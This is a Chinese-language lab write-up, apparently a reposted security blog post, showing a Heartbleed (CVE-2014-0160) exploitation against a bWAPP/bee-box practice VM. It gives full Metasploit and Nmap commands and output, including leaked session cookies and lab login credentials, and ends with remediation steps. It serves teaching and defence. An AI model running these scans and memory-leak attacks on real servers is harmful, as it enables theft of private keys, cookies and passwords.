![图片[1]-CVE-2014-0160 – 作者:LXNSEC-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200724/1595577014.png)
CVE-2014-0160
Heartbleed 漏洞
攻击者可以追踪 OpenSSL 所分配的 64KB 缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容,这样一来受害者的内存内容就会以每次 64KB 的速度进行泄露
漏洞危害:可以通过该漏洞读取每次攻击泄露出来的信息,所以可能也可以获取到服务器的私钥,用户 cookie 和密码等
OpenSSL 1.0.1~1.0.1f 版本、 OpenSSL 1.0.2-beta~1.0.2-beta1 版本存在”Heartbleed”
本次测试环境
Kali Linux 192.168.1.8
bee-box ubuntu靶场 192.168.1.6
Bee-box 官方称呼 BWAPP, buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源 Web 应用程序,目的是帮住网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过 100 种漏洞,涵盖了所有主要的已知 Web 漏洞,包括OWASPTop10 安全风险,最重要的是已经包含了 OpenSSL 和 ShellShock 漏洞
bWAPP 靶场和Metasploitable 一样,打开压缩包后使用虚拟机软件直接打开即可,封装好的虚拟机应用
![图片[2]-CVE-2014-0160 – 作者:LXNSEC-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20200724/1595576879.png)
SSL(Secure Sockets Layer 安全套接字协议),及其继任者传输层安全(Transport Layer Security,TLS)是为网络通信提供安全及数据完整性的一种安全协议
TLS与SSL在传输层与应用层之间对网络连接进行加密
SSL服务一般运行在443、8443、4433或者自定义端口,通过端口扫描或者版本探测可以得知SSL版本信息
进入到 MSF 控制台,使用端口扫描探测目标主机端口开放情况,这里为了提高效率使用 TCP 端口扫描模块,但这种方式并不隐蔽
msf5 > search portscan Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/scanner/http/wordpress_pingback_access normal No WordPress Pingback Locator 1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner 2 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner 3 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner 4 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner 5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner 6 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner 7 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner Interact with a module by name or index, for example use 7 or use auxiliary/scanner/sap/sap_router_portscanner msf5 > use 5 msf5 auxiliary(scanner/portscan/tcp) > options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host DELAY 0 yes The delay between connections, per thread, in milliseconds JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.6 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' THREADS 10 yes The number of concurrent threads (max one per host) TIMEOUT 1000 yes The socket connect timeout in milliseconds msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.6 rhosts => 192.168.1.6 msf5 auxiliary(scanner/portscan/tcp) > set threads 10 threads => 10 msf5 auxiliary(scanner/portscan/tcp) > exploit [+] 192.168.1.6: - 192.168.1.6:25 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:22 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:21 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:80 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:139 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:443 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:445 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:512 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:514 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:513 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:666 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:3306 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:3632 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:5901 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:6001 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:8080 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:8443 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:9080 - TCP OPEN [+] 192.168.1.6: - 192.168.1.6:9443 - TCP OPEN [*] 192.168.1.6: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
目标主机开放 443、8443、9443 端口,MSF 包含有 SSL 版本探测模块,但是效果不太理想,下一步借助 Nmap 进行服务探测
root@X:~# nmap -sV -p 443,8443,9443 192.168.1.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:43 CST Nmap scan report for bogon (192.168.1.6) Host is up (0.00038s latency). PORT STATE SERVICE VERSION 443/tcp open ssl/https? 8443/tcp open ssl/https-alt nginx/1.4.0 9443/tcp open ssl/tungsten-https? MAC Address: 00:0C:29:3E:BA:70 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.27 seconds
443、8443、9443 三个端口都运行SSL服务,然后借助 Nmap NSE 脚本探测是否存在”Heartbleed”漏洞
root@X:~# nmap -sV -p 443 --script ssl-heartbleed.nse 192.168.1.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:46 CST Nmap scan report for bogon (192.168.1.6) Host is up (0.00044s latency). PORT STATE SERVICE VERSION 443/tcp open ssl/https? MAC Address: 00:0C:29:3E:BA:70 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.82 seconds root@X:~# nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.1.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:46 CST Nmap scan report for bogon (192.168.1.6) Host is up (0.00044s latency). PORT STATE SERVICE VERSION 8443/tcp open ssl/https-alt nginx/1.4.0 |_http-server-header: nginx/1.4.0 | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 | http://www.openssl.org/news/secadv_20140407.txt |_ http://cvedetails.com/cve/2014-0160/ MAC Address: 00:0C:29:3E:BA:70 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.43 seconds root@X:~# nmap -sV -p 9443 --script ssl-heartbleed.nse 192.168.1.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-24 14:47 CST Nmap scan report for bogon (192.168.1.6) Host is up (0.00044s latency). PORT STATE SERVICE VERSION 9443/tcp open ssl/tungsten-https? MAC Address: 00:0C:29:3E:BA:70 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.02 seconds
通过探测结果得知 8443端口 “Risk factor: High” “OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug”,存在高风险漏洞,运行 OpenSSL 1.0.1 (1.0.2)版本,存在”Heartbleed”漏洞
然后回到 MSF 控制台,找到 OpenSSL “Heartbleed”扫描模块
msf5 > search auxiliary name:openssl Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/ssl/dtls_changecipherspec 2000-04-26 normal No OpenSSL DTLS ChangeCipherSpec Remote DoS 1 auxiliary/dos/ssl/dtls_fragment_overflow 2014-06-05 normal No OpenSSL DTLS Fragment Buffer Overflow DoS 2 auxiliary/dos/ssl/openssl_aesni 2013-02-05 normal No OpenSSL TLS 1.1 and 1.2 AES-NI DoS 3 auxiliary/scanner/ssl/openssl_ccs 2014-06-05 normal No OpenSSL Server-Side ChangeCipherSpec Injection Scanner 4 auxiliary/scanner/ssl/openssl_heartbleed 2014-04-07 normal Yes OpenSSL Heartbeat (Heartbleed) Information Leak 5 auxiliary/server/openssl_altchainsforgery_mitm_proxy 2015-07-09 normal No OpenSSL Alternative Chains Certificate Forgery MITM Proxy 6 auxiliary/server/openssl_heartbeat_client_memory 2014-04-07 normal No OpenSSL Heartbeat (Heartbleed) Client Memory Exposure Interact with a module by name or index, for example use 6 or use auxiliary/server/openssl_heartbeat_client_memory msf5 > use 4 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > options Module options (auxiliary/scanner/ssl/openssl_heartbleed): Name Current Setting Required Description ---- --------------- -------- ----------- DUMPFILTER no Pattern to filter leaked memory before storing LEAK_COUNT 1 yes Number of times to leak memory per SCAN or DUMP invocation MAX_KEYTRIES 50 yes Max tries to dump key RESPONSE_TIMEOUT 10 yes Number of seconds to wait for a server response RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 443 yes The target port (TCP) STATUS_EVERY 5 yes How many retries until key dump status THREADS 1 yes The number of concurrent threads (max one per host) TLS_CALLBACK None yes Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES) TLS_VERSION 1.0 yes TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2) Auxiliary action: Name Description ---- ----------- SCAN Check hosts for vulnerability
只需要对主机、端口参数进行设置,IP是bee-box的地址,端口的话默认为443,但是上面探测到目标主机 8443 端口存在”Heartbleed”漏洞,所以需要重新设置,然后有一个隐藏参数”VERBOSE”,这个参数的话就是不单输出结果,也打印出脚本运行的过程,这个参数的话每个模块都可以设置
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.1.6 rhosts => 192.168.1.6 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443 rport => 8443 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true verbose => true
设置完后,通过Kali 浏览器登录bee-box Web页面,输入账号密码,运行查看测试结果
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit [*] 192.168.1.6:8443 - Leaking heartbeat response #1 [*] 192.168.1.6:8443 - Sending Client Hello... [*] 192.168.1.6:8443 - SSL record #1: [*] 192.168.1.6:8443 - Type: 22 [*] 192.168.1.6:8443 - Version: 0x0301 [*] 192.168.1.6:8443 - Length: 86 [*] 192.168.1.6:8443 - Handshake #1: [*] 192.168.1.6:8443 - Length: 82 [*] 192.168.1.6:8443 - Type: Server Hello (2) [*] 192.168.1.6:8443 - Server Hello Version: 0x0301 [*] 192.168.1.6:8443 - Server Hello random data: 5f1a8ad289f5809a4b512ac9a22237249b311a14ef12137e19752197ea669fa1 [*] 192.168.1.6:8443 - Server Hello Session ID length: 32 [*] 192.168.1.6:8443 - Server Hello Session ID: 89f0ea0e360dd67589a5fe1ea128e2dae58c88777b4dbe6de32c2c0e623500ce [*] 192.168.1.6:8443 - SSL record #2: [*] 192.168.1.6:8443 - Type: 22 [*] 192.168.1.6:8443 - Version: 0x0301 [*] 192.168.1.6:8443 - Length: 675 [*] 192.168.1.6:8443 - Handshake #1: [*] 192.168.1.6:8443 - Length: 671 [*] 192.168.1.6:8443 - Type: Certificate Data (11) [*] 192.168.1.6:8443 - Certificates length: 668 [*] 192.168.1.6:8443 - Data length: 671 [*] 192.168.1.6:8443 - Certificate #1: [*] 192.168.1.6:8443 - Certificate #1: Length: 665 [*] 192.168.1.6:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name [email protected],CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name [email protected],CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#<OpenSSL::BN:0x00007fe901ce4b68>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC> [*] 192.168.1.6:8443 - SSL record #3: [*] 192.168.1.6:8443 - Type: 22 [*] 192.168.1.6:8443 - Version: 0x0301 [*] 192.168.1.6:8443 - Length: 203 [*] 192.168.1.6:8443 - Handshake #1: [*] 192.168.1.6:8443 - Length: 199 [*] 192.168.1.6:8443 - Type: Server Key Exchange (12) [*] 192.168.1.6:8443 - SSL record #4: [*] 192.168.1.6:8443 - Type: 22 [*] 192.168.1.6:8443 - Version: 0x0301 [*] 192.168.1.6:8443 - Length: 4 [*] 192.168.1.6:8443 - Handshake #1: [*] 192.168.1.6:8443 - Length: 0 [*] 192.168.1.6:8443 - Type: Server Hello Done (14) [*] 192.168.1.6:8443 - Sending Heartbeat... [*] 192.168.1.6:8443 - Heartbeat response, 13027 bytes [+] 192.168.1.6:8443 - Heartbeat response with leak, 13027 bytes [*] 192.168.1.6:8443 - Printable info leaked: ......_.....}B.H..E..Q}~.....#..#....>..f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................nt: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36..Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9..Sec-Fetch-Site: same-origin..Sec-Fetch-Mode: navigate..Sec-Fetch-User: ?1..Sec-Fetch-Dest: document..Referer: https://192.168.1.6:8443/bWAPP/login.php..Accept-Encoding: gzip, deflate, br..Accept-Language: zh-CN,zh;q=0.9..Cookie: security_level=0; has_js=1; SSESS69d48e9cb2494800d35a2885f929b4c0=2cJgbKzUUqrxqCQESHGR3Ahi5hZghsqC5TLJA2FTa7Y; PHPSESSID=016a426db5693f8f8598a2efda6097f3....X...H...s..K.3.y; SSESS69d48e9cb2494800d35a2885f929b4c0=2cJgbKzUUqrxqCQESHGR3Ahi5hZghsqC5TLJA2FTa7Y....login=bee&password=bug&security_level=0&form=submit}?_....K.s...u.2..................................................................................................................................... repeated 11799 times ..................................................................................................................................... [*] 192.168.1.6:8443 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
“Heartbeat response with leak, 13027 bytes”,响应泄露信息13027字节
“login=bee&password=bug&security_level=0&form=submit”
泄露的信息中包含了其他登录用户的账号信息
漏洞修复
1.将受影响的服务器下线,避免它继续泄露敏感信息
2.停止旧版的openssl服务,升级openssl到最新版本,并重新启动
3.生产新密钥,攻击者可以通过漏洞获取私钥,将新密钥提交给CA,获得新的认证之后再服务器上安装新密钥
4.服务器上线
5.撤销旧认证
6.撤销现有的会话cookies
7.要求用户修改密码
来源:freebuf.com 2020-07-24 15:54:24 by: LXNSEC
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册